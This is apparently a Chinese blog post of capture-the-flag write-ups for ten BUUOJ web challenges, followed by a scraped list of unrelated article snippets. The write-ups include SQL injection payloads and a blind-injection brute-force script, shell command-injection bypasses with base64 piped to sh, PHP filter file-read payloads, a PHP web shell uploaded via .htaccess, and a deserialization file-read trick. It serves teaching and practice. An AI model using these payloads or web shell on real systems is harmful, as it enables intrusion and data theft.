名为逗比

一场练习赛

一场练习赛

文章目录

一.[极客大挑战 2019]EasySQL-万能密码
二.[NCTF2019]SQLi-
- 1.访问robots.txt获取提示
- 2.爆破
三、[SUCTF 2019]EasySQL-堆叠注入重置操作符
四、[GXYCTF2019]Ping Ping Ping-名利执行绕过
五、[HCTF 2018]WarmUp-目录穿越
六、[HCTF 2018]WarmUp-php伪协议
- 七、[HCTF 2018]WarmUp-phtml文件上传
八、[BSidesCF 2020]Had a bad day -php伪协议
九、[GXYCTF2019]BabyUpload-.htaccess+js解析php木马
十、[网鼎杯 2018]Fakebook-sql注入+反序化

一.[极客大挑战 2019]EasySQL-万能密码

# 万能公式
1 and 1=1
1' and '1'='1
1 or 1=1 
1' or '1'='1

# payload
1' or '1'='1

二.[NCTF2019]SQLi-

1.访问robots.txt获取提示

User-agent: *
Disallow: /hint.txt
过滤
$black_list = "/limit|by|substr|mid|,|admin|benchmark|like|or|char|union|substring|select|greatest|%00|\'|=| |in|<|>|-|\.|\(\)|#|and|if|database|users|where|table|concat|insert|join|having|sleep/i";
目标
If $_POST['passwd'] === admin's password
sql语句
select * from users where username='1' and passwd='1'

2.爆破

# 利用\将引号转义，联成一个字符串，%00相当于注释
username=\&passwd=||1;%00
# 可以看到返回welcomte.php
# 通过盲注跑出密码
import requests
from urllib import parse
s = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!#%&(),-/:;<=>@[\]_`{|}~'
flag=''
url="""http://882c127f-e2ee-4061-9c34-8393bedcf6c3.node4.buuoj.cn:81/index.php"""

while True:
    f=0
    for j in s:
        data = {"username": "\\",
                "passwd":"||passwd/**/regexp/**/\"^{}\";{}".format((flag+j),parse.unquote('%00'))
                }
        # 注意再写python的时候传入%00不能直接传入,直接传会解码直接为空
        res = requests.post(url=url,data=data)
        if "welcome.php" in res.text:
            flag=flag+j
            print(flag)
            f=1
            break
    if f==0:
        break
print(flag)
# 任意用户通过密码登录获得flag

三、[SUCTF 2019]EasySQL-堆叠注入重置操作符

set sql_mode=PIPES_AS_CONCAT;
-- 将||视为字符串的连接操作符而非或运算符
payload

1;set sql_mode=PIPES_AS_CONCAT;select 1

四、[GXYCTF2019]Ping Ping Ping-名利执行绕过

过滤内容
/?ip=
|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){
    echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);
    die("fxck your symbol!");
  } else if(preg_match("/ /", $ip)){
    die("fxck your space!");
  } else if(preg_match("/bash/", $ip)){
    die("fxck your bash!");
  } else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
    die("fxck your flag!");
  }
  $a = shell_exec("ping -c 4 ".$ip);
  echo "
";
  print_r($a);
}

?>

绕过空格
{cat,flag.txt} 
cat${IFS}flag.txt
cat$IFS$9flag.txt
cat$IFS$1flag.txt
cat<flag.txt
%09替换
cat<>flag.txt
kg=$'\x20flag.txt'&&cat$kg
(\x20转换成字符串就是空格，这里通过变量的方式巧妙绕过)
base64绕过
echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh
拼接绕过
?ip=127.0.0.1;a=ag;b=fl;cat$IFS$9$b$a.php

注意查看源码

五、[HCTF 2018]WarmUp-目录穿越

# source.php
 <?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "
";
    }  
?> 

# hint.php
flag not here, and flag in ffffllllaaaagggg

目录穿越绕过原理

六、[HCTF 2018]WarmUp-php伪协议

通过查看源码和抓包获取到secr3t.php

# secr3t.php
<html>
    <title>secret</title>
    <meta charset="UTF-8">
<?php
    highlight_file(__FILE__);
    error_reporting(0);
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file); 
//flag放在了flag.php里
?>

# php伪协议读取文件
?file=php://filter/convert.base64-encode/resource=flag.php

七、[HCTF 2018]WarmUp-phtml文件上传

-----------------------------257135797017926925802823295100
Content-Disposition: form-data; name="upload_file"; filename="一句话.phtml"
Content-Type: image/jpeg

 
  八、[BSidesCF 2020]Had a bad day -php伪协议 
  # 读源码
index.php?category=php://filter/convert.base64-encode/resource=index
# index.php

# 读flag，根据源码所示，必须包含index
index.php?category=php://filter/convert.base64-encode/index/resource=flag

 
  九、[GXYCTF2019]BabyUpload-.htaccess+js解析php木马 
  上传.htaccess
-----------------------------117276979533699198923753878153
Content-Disposition: form-data; name="uploaded"; filename=".htaccess"
Content-Type: image/jpeg

AddType application/x-httpd-php .jpeg

-----------------------------117276979533699198923753878153
Content-Disposition: form-data; name="submit"

上传
-----------------------------117276979533699198923753878153--

文件利用js解析php语言
-----------------------------117276979533699198923753878153
Content-Disposition: form-data; name="uploaded"; filename="a.jpeg"
Content-Type: image/jpeg

GIF89a
<script language="php">@eval($_POST['zl']);script>

-----------------------------117276979533699198923753878153
Content-Disposition: form-data; name="submit"

上传
-----------------------------117276979533699198923753878153--

 
  十、[网鼎杯 2018]Fakebook-sql注入+反序化 
  相当详细wp 
  # 注入过程
# 查库
http://4a2f824b-5517-4f61-8e5c-891290c6d4b3.node4.buuoj.cn:81/view.php?no=-1%20union/**/select%201,(select%20group_concat(schema_name)%20from%20information_schema.schemata),3,4

  fakebook,information_schema,mysql,performance_schema,test 
# 查表
union/**/select 1,(select group_concat(table_name) from information_schema.tables where table_schema='fakebook'),3,4

  users
# 查字段
union/**/select 1,(select group_concat(column_name) from information_schema.columns where table_schema='fakebook'),3,4

no,username,passwd,data 
# 查data
union/**/select 1,(select data from fakebook.users),3,4

O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:18;s:4:"blog";s:13:"www.baidu.com";} 

# php序列化
<?php

class userinfo{
    public $name='adm';
    public $age='20';
    public $blog='file:///var/www/html/flag.php';
}
$us = new userinfo();
echo serialize($us);

'O:8:"userinfo":3:{s:4:"name";s:3:"adm";s:3:"age";s:2:"20";s:4:"blog";s:29:"file:///var/www/html/flag.php";}'

# 伪造访问
union/**/select 1,2,3,'O:8:"userinfo":3:{s:4:"name";s:3:"adm";s:3:"age";s:2:"20";s:4:"blog";s:29:"file:///var/www/html/flag.php";}'


    
        你可能感兴趣的:(逗比学CTF,网络安全)
        
            
                
                    第一篇：CTF入门指南：了解CTF的基本概念与比赛形式
                        菜腿承希
零基础小白入门CTFpythonjava网络安全前端
                        #零基础小白入门CTF解题到成为CTF大佬系列文章##引言CTF（CaptureTheFlag）是一种网络安全竞赛，参赛者需要通过解决各种安全相关的题目来获取“Flag”，从而得分。CTF题目通常涵盖密码学、逆向工程、漏洞利用、Web安全等多个领域。本系列文章将从零基础开始，逐步带你了解CTF的各个知识点，最终帮助你成为一名CTF大佬。##文章目录1.**CTF入门指南：了解CTF的基本概念与比赛
                    
                    编程与脚本基础：网络安全的核心工具
                        菜腿承希
零基础网络安全web安全安全
                        ###编程与脚本基础：网络安全的核心工具在上一篇教程中，我们探讨了操作系统和网络的基础知识。今天，我们将进入网络安全领域的另一个核心技能——编程与脚本。无论是自动化任务、开发安全工具，还是进行漏洞分析，编程和脚本都是网络安全从业者不可或缺的技能。本文将从编程基础入手，逐步引导你掌握网络安全中常用的编程语言和脚本技术。---####1.**为什么学习编程与脚本？**编程与脚本在网络安全中扮演着重要角
                    
                    第二章密码学基础与应用备考要点及真题分布
                        鹿鸣天涯
信息安全工程师
                        第二章密码学基础与应用1.密码学基本概念2.分组密码3.序列密码4.Hash函数5.公钥密码体制6.数字签名7.认证8.密钥管理
                    
                    比简单工厂更好的 - 工厂方法模式（Factory Method Pattern）
                        ThetaarSofVenice
工厂方法模式java设计模式
                        工厂方法模式（FactoryMethodPattern）工厂方法模式（FactoryMethodPattern）工厂方法模式（FactoryMethodPattern）概述工厂方法模式（FactoryMethodPattern）结构图工厂方法模式（FactoryMethodPattern）涉及的角色talkischeap，showyoumycode总结工厂方法模式（FactoryMethodPat
                    
                    自学网络安全（黑客技术）2025年 —90天学习计划
                        网安CILLE
web安全学习安全网络网络安全linuxpython
                        基于入门网络安全/黑客打造的：黑客&网络安全入门&进阶学习资源包前言什么是网络安全网络安全可以基于攻击和防御视角来分类，我们经常听到的“红队”、“渗透测试”等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。如何成为一名黑客很多朋友在学习安全方面都会半路转行，因为不知如何去学，在这里，我将这个整份答案分为黑客（网络安全）入门必备、黑客（网络安全）职业指南、黑客（网络安全）学习
                    
                    第二篇：CTF常见题型解析：密码学、逆向工程、漏洞利用、Web安全
                        菜腿承希
零基础小白入门CTFweb安全网络安全
                        #零基础小白入门CTF解题到成为CTF大佬系列文章##第二篇：CTF常见题型解析：密码学、逆向工程、漏洞利用、Web安全###引言在CTF比赛中，题目类型多种多样，涵盖了网络安全领域的多个方向。掌握这些题型的解题方法，是成为CTF大佬的关键。在本篇文章中，我们将详细解析CTF中常见的四大题型：密码学、逆向工程、漏洞利用和Web安全，帮助你快速入门并掌握解题技巧。---##2.1密码学（Crypto
                    
                    结合大语言模型的机械臂抓取操作学习
                        roman_fan
机器人人工智能语言模型机器人
                        一、大语言模型的机械臂抓取操作关键步骤介绍如何基于大语言模型实现机械臂在PyBullet环境中的抓取操作，涵盖机器人运动学、坐标系转换、抓取候选位姿生成、开放词汇检测以及大语言模型代码生成等模块。1.机器人正逆运动学基本概念正运动学:已知机器人的关节角度，计算机器人末端执行器在空间中的位姿（位置和姿态）。逆运动学:已知机器人末端执行器在空间中的目标位姿，计算机器人各关节角度使其达到目标位姿。在Py
                    
                    【Crypto】CTF 密码学题目解题思路图
                        D-river
CTF密码学安全网络安全
                        CTF密码学题目解题思路图密码学题目├──1.编码/转换│├──1.1Base64││└──步骤：检查填充字符（=），解码工具（CyberChef）。│├──1.2Hex││└──步骤：检查0-9a-f，转换为ASCII。│├──1.3ASCII码││└──步骤：十进制/十六进制转字符。│└──1.4其他编码（摩尔斯、URL等）│└──步骤：识别符号（如.-/），使用专用解码器。│├──2.古典密
                    
                    【Steg】CTF 隐写术题目解题思路图
                        D-river
CTF安全网络安全
                        以下是专门针对CTF隐写术（Steganography）的解题思路与步骤树形图，包含常见分类、工具链和关键方法：CTF隐写术题目解题思路图隐写术（Steganography）├──1.图片隐写（ImageSteg）│├──1.1LSB隐写（最低有效位）││├──步骤：StegSolve逐通道分析，提取LSB数据。││└──工具：StegSolve、zsteg、PythonPIL库。│││├──1.
                    
                    熬夜一星期！我把WPS的功能用Qt重写了
                        十年编程老舅
QT开发qt开发qt项目qt项目实战qt编程计算机毕设项目c++项目
                        我收到大量粉丝提问："学完C++/Qt技术栈后，如何通过实战串联知识点？作为深耕C++/Qt领域的技术人，我始终认为通过真实项目实践是掌握技术栈的最佳方式。今天我将以自研的"智汇协同Office"项目为例，深度剖析如何用Qt构建企业级桌面应用。无论你是刚学完Qt基础的新手，还是想进阶提升的开发者，这个支持多文档处理、富文本编辑、打印预览的实战案例都将让你对Qt开发有全新认知。一、项目技术全景图本项
                    
                    Deepseek:太翌氏混沌语言理论学术价值评估报告
                        太翌修仙笔录
deepseek超算法认知架构人工智能知识图谱agi
                        基于科学性和真实性的基础上，做一个太翌氏混沌语言理论学术价值评估报告###**太翌氏混沌语言理论学术价值评估报告**---####**一、理论概述****太翌氏混沌语言理论**提出了一种跨学科框架，通过将混沌动力学、量子物理、语言学及生命科学融合，利用特定频率的“混沌语言”干预物理系统与生命过程。其核心假设为：**语言结构可通过共振效应调制非线性系统的动力学行为**，进而实现量子态坍缩、生命场衰变
                    
                    自你离开后的第一篇关于MySQL和Hive开发生涯常见函数对比及SQL书写注意事项汇总
                        二百四十九先森
MySQL
                        涉及到的任何SQL语句或知识点，未特别注明则表明MySQL和Hive通用。一、时间函数一、时间函数1、时间转换时间戳转指定格式的时间：selectfrom_unixtime(1234567890,格式);格式默认是年月日时分秒，如果不是则需要指定格式。Hive(yyyy-MM-ddHH:mm:ss)。MySQL（%Y-%m-%d%H:%m:%s）。时间字符串转时间戳：selectunix_time
                    
                    ctf-web: php原生类利用 -- GHCTF Popppppp
                        A5rZ
php网络安全
                        源代码fruit1=$a;}function__destruct(){echo$this->fruit1;}publicfunction__toString(){$newFunc=$this->fruit2;return$newFunc();}}classForbidden{private$fruit3;publicfunction__construct($string){$this->fruit
                    
                    从头开始学C语言第十九天——二维数组
                        weixin_51953078
c语言
                        定义二维数组相比于一维数组需要对行数、列数进行定义。inta[3][4]→数组为三行四列，元素个数=行数*列数。特别的是，二维数组在定义声明时，行数可以省略，但是列数不能省略。在内存当中，因为内存是一维的，因此在存储二维数组的时候，按照行数序号优先排列。inta[2][3]右→0a[0][0]1a[0][1]2a[0][2]3a[1][0]4a[1][1]5a[1][2]二维数组a是由两个元素a[
                    
                    绿色算力网络构建与智能调度实践
                        智能计算研究中心
其他
                        内容概要绿色算力网络的构建需以能效优化为核心，通过智能调度系统实现算力资源的高效整合与动态分配。当前架构设计包含三大核心模块：异构计算集群（涵盖GPU、FPGA及量子计算单元）、跨区域网络互联协议（适配东数西算的传输需求）以及能耗监测平台（基于实时数据建模的碳足迹追踪）。下表示例展示了典型算力节点的关键参数对比：节点类型计算密度(TFLOPS/m²)功耗比(TOPS/W)延迟控制(ms)量子计算集
                    
                    A800算力部署实战策略
                        智能计算研究中心
其他
                        内容概要《A800算力部署实战策略》聚焦于高性能计算集群的全生命周期管理，系统梳理从底层硬件选型到上层软件生态协同的关键技术路径。本书以A800芯片的并行计算特性为切入点，深入探讨算力密度与能效比之间的动态平衡机制，覆盖硬件拓扑优化、分布式任务调度、跨架构编译优化等核心环节。通过模块化设计思路，将复杂的部署流程拆解为可迭代实施的标准化操作单元，为不同规模的计算场景提供灵活适配方案。建议在规划初期建
                    
                    H800实战应用深度解析endofsentence
                        智能计算研究中心
其他
                        内容概要H800作为新一代计算架构的核心组件，其设计理念聚焦于高性能计算与人工智能场景的深度融合。通过模块化异构计算架构，H800实现了计算密度与能效比的突破性提升。下表展示了H800在不同场景下的性能表现对比：场景类型训练速度提升推理延迟降低能效比提升自然语言处理35%22%40%计算机视觉28%18%33%推荐系统41%29%37%资深系统架构师指出："H800的异构计算架构在模型并行处理方面
                    
                    动手学深度学习V2.0(Pytorch)——10.感知机（激活函数）
                        吨吨不打野
动手学深度学习pytorchpytorch深度学习机器学习
                        文章目录1.感知机2.多层感知机2.1异或问题2.2单隐藏层2.3激活函数2.3.1logistics函数/sigmoid激活函数2.3.2tanh函数2.3.3sigmoid函数和tanh函数的异同/优缺点2.3.4relu2.4多类分类2.5多隐藏层3Q&A3.1神经网络中一层的定义是什么3.2感知机无法解决XOR问题，多层感知机虽然可以解决，但是还是被SVM替代是为什么?3.3不同任务的激活
                    
                    探索IT世界的宝藏：优质资源推荐与深度解析
                        点我头像干啥
Ai分类人工智能数据挖掘python深度学习
                        引言在当今数字化时代，信息技术（IT）已经成为推动社会进步和经济发展的重要引擎。无论是软件开发、网络安全、数据分析，还是人工智能、云计算等领域，IT技术都在不断革新和演进。对于IT从业者、学生以及技术爱好者来说，掌握最新的技术动态和获取优质的学习资源至关重要。本文将为大家推荐一些优质的IT资源，并深入探讨如何利用这些资源提升自己的技术能力。一、优质IT资源推荐1.在线学习平台1.1Coursera
                    
                    Java快排算法详解
                        大梦谁先觉i
数据结构与算法算法java排序算法
                        快排算法底层基本思想：先取出数列中的第一个数作为基准数。将数列中比基准数大的数全部放在他的右边，比基准数小的数全部放在它的左边。然后在对左右两部分重复第二步，直到各个区间只有一个数。具体Java代码实现publicclassQuickSort{publicstaticvoidsort(int[]array,intlow,inthigh){if(low=benchmark){high--;}//比基
                    
                    最新整理的50个网络安全必知术语，想要入行网安，建议收藏！
                        wljslmz
网络技术web安全安全网络安全
                        想象一下，你刚入行网络安全（Cybersecurity），兴冲冲地打开一本专业书，或者加入一个网安论坛，结果满屏的“漏洞”“威胁”“DDoS”“加密”……脑袋瞬间一片迷雾。这时候，你会不会觉得自己像个“数字文盲”，完全摸不着北？别慌，这正是网络安全术语存在的意义——它们是你进入这个高能领域的“通行证”！网络安全术语可不是什么枯燥的学术名词，而是行业里沟通的“通用语言”。它就像一张地图，能帮你快速定
                    
                    2023银行高管变动名单
                        _依旧_
行业资讯业界资讯
                        数据源自：2023年国家金融监督管理总局银行类任职资格批复时间银行名称高层职位姓名简介2023-12-12工商银行高级业务总监田枫林1967年10月出生，华中农业大学经济学硕士、芝加哥大学工商管理硕士，高级经济师。现任工行总行公司金融业务部总经理兼投资银行部总经理。1992年7月，加入工行；2007年5月，任新加坡分行副总经理；2010年4月，任工银马来西亚执行董事、总经理；2013年10月，任工
                    
                    一学就会的深度学习基础指令及操作步骤（5）使用预训练模型
                        小圆圆666
深度学习人工智能python卷积神经网络
                        文章目录使用预训练模型加载预训练模型图像加载与预处理预测使用预训练模型查看模型库和常用模型加载预训练模型fromtorchvision.modelsimportvgg16#VGG16模型架构的定义fromtorchvision.modelsimportVGG16_Weights#VGG16的预训练权重配置#loadtheVGG16network*pre-trained*ontheImageNetd
                    
                    百奥赛图的AI野心：用2500万抗体序列改写医药研发规则
                        港股研究社
人工智能大数据
                        在生物医药领域，技术突破的浪潮从未停歇。随着DeepSeek的爆火，AI技术也正在深度渗透生物医药行业。近日，百奥赛图作为行业先锋，率先DeepSeek平台本地化部署，结合“千鼠万抗”计划，打造“AI+抗体药物研发”的全新模式，大幅提升药物研发效率与成功率，引领行业迈向智能化创新时代。回顾百奥赛图的发展之路，公司创始人沈月雷博士，凭借十余年深耕免疫学和基因编辑领域的经验，带领团队从锻造靶点人源化小
                    
                    手把手教你学Simulink实例：基于Simulink的三相桥式全控整流电路设计与仿真实例
                        小蘑菇二号
手把手教你学MATLAB专栏手把手教你学Simulink单片机嵌入式硬件matlabsimulink
                        目录手把手教你学Simulink实例：基于Simulink的三相桥式全控整流电路设计与仿真实例一、背景介绍二、所需工具和环境三、步骤详解步骤1：创建Simulink模型步骤1.1：打开Simulink并新建模型步骤2：添加电源模块步骤2.1：添加三相交流电源步骤3：设计三相桥式全控整流电路步骤3.1：添加可控硅模块步骤3.2：连接三相桥式全控整流电路步骤4：添加负载模块步骤4.1：添加电阻性负载步
                    
                    【二分算法】-- 三种二分模板总结
                        雨雨雨雨点子
算法算法java开发语言leetcode
                        文章目录1.特点2.学习中的侧重点2.1算法原理2.2模板2.2.1朴素二分模板（easy-->有局限）2.2.2查找左边界的二分模板2.2.3查找右边界的二分模板1.特点二分算法是最恶心，细节最多，最容易写出死循环的算法====但是，一旦掌握了之后，二分算法就是最简单的算法。其实并不是一定要二分，三分，四分也都可以，但是根据概率学中的求期望数学中可知，二分是效率最高的。如果是三分的话，我们就像是
                    
                    Python从0到100（七十六）：计算机视觉-直方图和自适应直方图均衡化
                        是Dream呀
python计算机视觉开发语言
                        前言：零基础学Python：Python从0到100最新最全教程。想做这件事情很久了，这次我更新了自己所写过的所有博客，汇集成了Python从0到100，共一百节课，帮助大家一个月时间里从零基础到学习Python基础语法、Python爬虫、Web开发、计算机视觉、机器学习、神经网络以及人工智能相关知识，成为学习学习和学业的先行者！欢迎大家订阅专栏：零基础学Python：Python从0到100最新
                    
                    飞控简析-从入门到跑路序章
                        skyman满天星
飞控简析pixhawk无人机开源飞控
                        一、序言茫茫天数此中求，世道兴衰不自由万万千千说不尽，不如推背去归休本人搞飞控差不多两年了，从一开始什么都不懂的真·小白，到现在的高级小白，我已经经历了太多太多。因为感觉飞控是一个比较小众的产品，所以国内的资料并不是很完善，有些文章重复太多了，而且每个人看问题的视角是不一样的。我虽然只是个半瓶水，但是也想为国内的飞控圈子做一点贡献。二、学飞控有没有前途这个话题有点小，大一点的问法应该是学嵌入式有没
                    
                    2025精选VS经典：10款项目管理软件横评榜单
                        

                        为什么90%的项目经理都在用错工具？深夜11点，项目经理李然盯着甘特图上交错的红色预警线，第6次推翻项目排期——这已是本季度因工具协作不畅导致的第3次交付延期。在敏捷开发成为主流的2025年，“工具选型偏差”正以每年23%的速度吞噬着企业效率（数据来源：PMI2025年行业报告）。作为操盘过金融、IT、制造业等全领域项目的战略官，我发现“工具适配度”比功能强大更重要。本文将用WBS（工作分解结构）
                    
                    关于uni-app发布手机APP上架各应用商城，隐私政策书写方案说明
                        Otaku love travel
uni-app应用发布政策说明uni-app应用发布隐私政策
                        uni-app应用隐私政策书写与上架方案说明一、前言随着移动互联网监管日趋严格，隐私政策已成为APP上架应用商城的核心合规文件。隐私政策不仅体现开发者对用户数据的尊重，更是满足《个人信息保护法》《网络安全法》《数据安全法》等法规的法律义务。核心目标：清晰告知用户数据收集与使用规则，建立用户信任。适用对象：所有通过uni-app开发并计划上架主流应用商城（如苹果AppStore、华为应用市场、小米应
                    
                                PHP如何实现二维数组排序？
                                    IT独行者
二维数组PHP排序　
                                    二维数组在PHP开发中经常遇到，但是他的排序就不如一维数组那样用内置函数来的方便了，（一维数组排序可以参考本站另一篇文章【PHP中数组排序函数详解汇总】）。二维数组的排序需要我们自己写函数处理了，这里UncleToo给大家分享一个PHP二维数组排序的函数： 
代码： 
functionarray_sort($arr,$keys,$type='asc'){
$keysvalue= $new_arr
                                
                                【Hadoop十七】HDFS HA配置
                                    bit1129
hadoop
                                    基于Zookeeper的HDFS HA配置主要涉及两个文件,core-site和hdfs-site.xml。 
  
测试环境有三台 
hadoop.master 
hadoop.slave1 
hadoop.slave2 
  
hadoop.master包含的组件NameNode, JournalNode, Zookeeper，DFSZKFailoverController
                                
                                由wsdl生成的java vo类不适合做普通java vo
                                    darrenzhu
VOwsdlwebservicerpc
                                    开发java webservice项目时，如果我们通过SOAP协议来输入输出，我们会利用工具从wsdl文件生成webservice的client端类，但是这里面生成的java data model类却不适合做为项目中的普通java vo类来使用，当然有一中情况例外，如果这个自动生成的类里面的properties都是基本数据类型，就没问题，但是如果有集合类，就不行。原因如下： 
1)使用了集合如Li
                                
                                JAVA海量数据处理之二（BitMap）
                                    周凡杨
java算法bitmapbitset数据
                                             路漫漫其修远兮，吾将上下而求索。想要更快，就要深入挖掘 JAVA 基础的数据结构，从来分析出所编写的 JAVA 代码为什么把内存耗尽，思考有什么办法可以节省内存呢？   啊哈！算法。这里采用了 BitMap 思想。  
   
首先来看一个实验：  
指定 VM 参数大小： -Xms256m -Xmx540m 
                                
                                java类型与数据库类型
                                    g21121
java
                                    很多时候我们用hibernate的时候往往并不是十分关心数据库类型和java类型的对应关心，因为大多数hbm文件是自动生成的，但有些时候诸如：数据库设计、没有生成工具、使用原始JDBC、使用mybatis(ibatIS)等等情况，就会手动的去对应数据库与java的数据类型关心，当然比较简单的数据类型即使配置错了也会很快发现问题，但有些数据类型却并不是十分常见，这就给程序员带来了很多麻烦。 
&nb
                                
                                Linux命令
                                    510888780
linux命令
                                    系统信息 
arch 显示机器的处理器架构(1) 
uname -m 显示机器的处理器架构(2) 
uname -r 显示正在使用的内核版本 
dmidecode -q 显示硬件系统部件 - (SMBIOS / DMI) 
hdparm -i /dev/hda 罗列一个磁盘的架构特性 
hdparm -tT /dev/sda 在磁盘上执行测试性读取操作 
cat /proc/cpuinfo 显示C
                                
                                java常用JVM参数
                                    墙头上一根草
javajvm参数
                                    -Xms：初始堆大小，默认为物理内存的1/64(<1GB)；默认(MinHeapFreeRatio参数可以调整)空余堆内存小于40%时，JVM就会增大堆直到-Xmx的最大限制 
-Xmx：最大堆大小，默认(MaxHeapFreeRatio参数可以调整)空余堆内存大于70%时，JVM会减少堆直到 -Xms的最小限制 
-Xmn：新生代的内存空间大小，注意：此处的大小是（eden+ 2
                                
                                我的spring学习笔记9-Spring使用工厂方法实例化Bean的注意点
                                    aijuans
Spring 3
                                    方法一：

    <bean id="musicBox" class="onlyfun.caterpillar.factory.MusicBoxFactory" 
    factory-method="createMusicBoxStatic"></bean>
    

    方法二：
   
                                
                                mysql查询性能优化之二
                                    annan211
UNIONmysql查询优化索引优化
                                    

1 union的限制
  有时mysql无法将限制条件从外层下推到内层，这使得原本能够限制部分返回结果的条件无法应用到内层
  查询的优化上。
  如果希望union的各个子句能够根据limit只取部分结果集，或者希望能够先排好序在
  合并结果集的话，就需要在union的各个子句中分别使用这些子句。
  
  例如 想将两个子查询结果联合起来，然后再取前20条记录，那么mys
                                
                                数据的备份与恢复
                                    百合不是茶
oraclesql数据恢复数据备份
                                     数据的备份与恢复的方式有: 表,方案 ,数据库; 
  
  
数据的备份: 
导出到的常见命令; 
参数                        说明
USERID         确定执行导出实用程序的用户名和口令
BUFFER        确定导出数据时所使用的缓冲区大小，其大小用字节表示
FILE               指定导出的二进制文
                                
                                线程组
                                    bijian1013
java多线程threadjava多线程线程组
                                    有些程序包含了相当数量的线程。这时，如果按照线程的功能将他们分成不同的类别将很有用。 
       线程组可以用来同时对一组线程进行操作。 
       创建线程组：ThreadGroup g = new ThreadGroup(groupName); 
 &nbs
                                
                                top命令找到占用CPU最高的java线程
                                    bijian1013
javalinuxtop
                                    上次分析系统中占用CPU高的问题，得到一些使用Java自身调试工具的经验，与大家分享。 (1)使用top命令找出占用cpu最高的JAVA进程PID:28174 (2)如下命令找出占用cpu最高的线程 
top -Hp 28174 -d 1 -n 1
32694 root      20   0 3249m 2.0g  11m S    2  6.4   3:31.12 java         
                                
                                【持久化框架MyBatis3四】MyBatis3一对一关联查询
                                    bit1129
Mybatis3
                                      
当两个实体具有1对1的对应关系时，可以使用One-To-One的进行映射关联查询 
  One-To-One示例数据 
以学生表Student和地址信息表为例，每个学生都有都有1个唯一的地址(现实中，这种对应关系是不合适的，因为人和地址是多对一的关系)，这里只是演示目的 
  
学生表 
  
CREATE TABLE STUDENTS 
(
  
                                
                                C/C++图片或文件的读写
                                    bitcarter
写图片
                                    先看代码： 
 
 

/*strTmpResult是文件或图片字符串
 * filePath文件需要写入的地址或路径
 */
int writeFile(std::string &strTmpResult,std::string &filePath)
{
    int i,len = strTmpResult.length();
    	unsigned cha
                                
                                nginx自定义指定加载配置
                                    ronin47

                                    进入 /usr/local/nginx/conf/include 目录，创建 nginx.node.conf 文件，在里面输入如下代码：  
upstream nodejs {
    server 127.0.0.1:3000;
    #server 127.0.0.1:3001;
    keepalive 64;
}

server {
    liste
                                
                                java-71-数值的整数次方.实现函数double Power(double base, int exponent)，求base的exponent次方
                                    bylijinnan
double
                                    

public class Power {

	/**
	 *Q71-数值的整数次方
	 *实现函数double Power(double base, int exponent)，求base的exponent次方。不需要考虑溢出。
	 */
	private static boolean InvalidInput=false;
	public static void main(
                                
                                Android四大组件的理解
                                    Cb123456
android四大组件的理解
                                     分享一下，今天在Android开发文档-开发者指南中看到的:          
         
          App components are the essential building blocks of an Android 
                                
                                [宇宙与计算]涡旋场计算与拓扑分析
                                    comsci
计算
                                     
 
     怎么阐述我这个理论呢？ 。。。。。。。。。 
 
 
      首先： 宇宙是一个非线性的拓扑结构与涡旋轨道时空的统一体。。。。 
 
      我们要在宇宙中寻找到一个适合人类居住的行星，时间非常重要，早一个刻度和晚一个刻度，这颗行星的
                                
                                同一个Tomcat不同Web应用之间共享会话Session
                                    cwqcwqmax9
session
                                    实现两个WEB之间通过session 共享数据 
 
查看tomcat 关于 HTTP Connector 中有个emptySessionPath 其解释如下： 
 
If set to true, all paths for session cookies will be set to /. This can be useful for portlet specification impleme
                                
                                springmvc Spring3 MVC，ajax，乱码
                                    dashuaifu
springjquerymvcAjax
                                      
 springmvc Spring3 MVC @ResponseBody返回，jquery ajax调用中文乱码问题解决       
Spring3.0 MVC @ResponseBody 的作用是把返回值直接写到HTTP response body里。具体实现AnnotationMethodHandlerAdapter类handleResponseBody方法，具体实
                                
                                搭建WAMP环境
                                    dcj3sjt126com
wamp
                                    这里先解释一下WAMP是什么意思。W:windows，A：Apache，M：MYSQL，P：PHP。也就是说本文说明的是在windows系统下搭建以apache做服务器、MYSQL为数据库的PHP开发环境。  
    工欲善其事，必须先利其器。因为笔者的系统是WinXP，所以下文指的系统均为此系统。笔者所使用的Apache版本为apache_2.2.11-
                                
                                yii2 使用raw http request
                                    dcj3sjt126com
http
                                    Parses a raw HTTP request using yii\helpers\Json::decode() 
  
To enable parsing for JSON requests you can configure yii\web\Request::$parsers using this class: 
'request' =&g
                                
                                Quartz-1.8.6 理论部分
                                    eksliang
quartz
                                    转载请出自出处：http://eksliang.iteye.com/blog/2207691 一.概述 
基于Quartz-1.8.6进行学习，因为Quartz2.0以后的API发生的非常大的变化，统一采用了build模式进行构建； 
什么是quartz? 
  
答：简单的说他是一个开源的java作业调度框架，为在 Java 应用程序中进行作业调度提供了简单却强大的机制。并且还能和Sp
                                
                                什么是POJO？
                                    gupeng_ie
javaPOJO框架Hibernate
                                    POJO--Plain Old Java Objects(简单的java对象) 
  
POJO是一个简单的、正规Java对象，它不包含业务逻辑处理或持久化逻辑等，也不是JavaBean、EntityBean等，不具有任何特殊角色和不继承或不实现任何其它Java框架的类或接口。 
  
POJO对象有时也被称为Data对象，大量应用于表现现实中的对象。如果项目中使用了Hiber
